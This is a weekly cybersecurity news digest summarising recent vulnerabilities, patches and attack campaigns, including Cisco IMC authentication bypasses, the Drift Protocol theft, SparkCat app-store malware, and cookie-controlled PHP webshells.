Originally reported by The Hacker News, Microsoft Security, SANS ISC, MSRC Security Updates
TL;DR
This week delivered a cascade of critical threats: Cisco released patches for CVSS 9.8 authentication bypass flaws, attackers drained $285 million from Drift Protocol using novel social engineering, and SparkCat malware returned to app stores targeting cryptocurrency recovery phrases.
Multiple critical vulnerabilities with CVSS 9.8 scores requiring immediate patching, combined with active exploitation campaigns targeting mobile wallets and enterprise infrastructure.
Cisco addressed a severe authentication bypass vulnerability in its Integrated Management Controller (IMC) that allows unauthenticated remote attackers to gain elevated system access. The flaw, tracked as CVE-2026-20093, carries a CVSS score of 9.8 and affects the core authentication mechanism. Cisco also patched a related vulnerability in its Smart Software Manager (SSM) with similar severity. Organizations using Cisco IMC should prioritize immediate patching to prevent complete system compromise.
Solana-based decentralized exchange Drift Protocol confirmed attackers drained approximately $285 million through a sophisticated social engineering attack exploiting "durable nonces" on April 1, 2026. The attackers gained unauthorized access to Drift's Security Council administrative powers, enabling rapid protocol takeover. Security researchers have linked the attack methodology to North Korean threat actors, representing one of the largest DeFi exploits of 2026.
Cybersecurity researchers discovered a new variant of SparkCat malware infiltrating both the Apple App Store and Google Play Store, more than a year after its initial discovery. The trojan conceals itself within legitimate-appearing applications including enterprise messaging and food delivery services. This iteration specifically targets cryptocurrency wallet recovery phrase images, representing a direct threat to digital asset security. The malware's persistence across multiple app store security reviews demonstrates sophisticated evasion techniques.
Cisco Talos identified a large-scale credential harvesting operation exploiting the React2Shell vulnerability (CVE-2025-55182) to compromise 766 Next.js hosts. Attackers systematically extracted database credentials, SSH private keys, AWS secrets, shell command history, Stripe API keys, and GitHub tokens. The campaign demonstrates how web framework vulnerabilities can become vectors for enterprise-wide credential compromise.
SANS Internet Storm Center reported active exploitation attempts targeting exposed Vite development server installations via CVE-2025-30208. Vite, a popular frontend build tool, presents attack surface when development instances remain accessible in production environments. Organizations should audit their development tool exposure and implement proper network segmentation.
Microsoft Security researchers detailed a sophisticated webshell technique using HTTP cookies to control PHP backdoors in Linux hosting environments. These cookie-gated webshells employ obfuscation, PHP-FPM execution, and cron-based persistence mechanisms to evade traditional detection methods. The technique demonstrates how threat actors are evolving beyond simple file-based webshells toward more subtle persistence mechanisms.
Microsoft reported threat actors are rapidly advancing from using AI as a tool to targeting AI systems as attack surfaces. Generative AI-enhanced phishing campaigns show 450% higher click-through rates compared to traditional methods. Additionally, attackers are industrializing multi-factor authentication bypass techniques using AI-generated social engineering content.
Microsoft disclosed CVE-2025-66038 in the OpenSC smart card library, where the sc_compacttlv_find_tag function can return out-of-bounds pointers. This vulnerability affects smart card authentication implementations across multiple platforms.
The Python cryptography library received patches for CVE-2026-34073, addressing incomplete DNS name constraint enforcement on peer names. This flaw could allow certificate validation bypasses in certain configurations.
Microsoft patched CVE-2026-32213 in Azure AI Foundry, an elevation of privilege vulnerability allowing unauthorized network-based privilege escalation due to improper authorization controls.
Chromium addressed CVE-2026-5289, a use-after-free vulnerability in the navigation component that affects Microsoft Edge and other Chromium-based browsers.
Originally reported by The Hacker News, Microsoft Security, SANS ISC, MSRC Security Updates
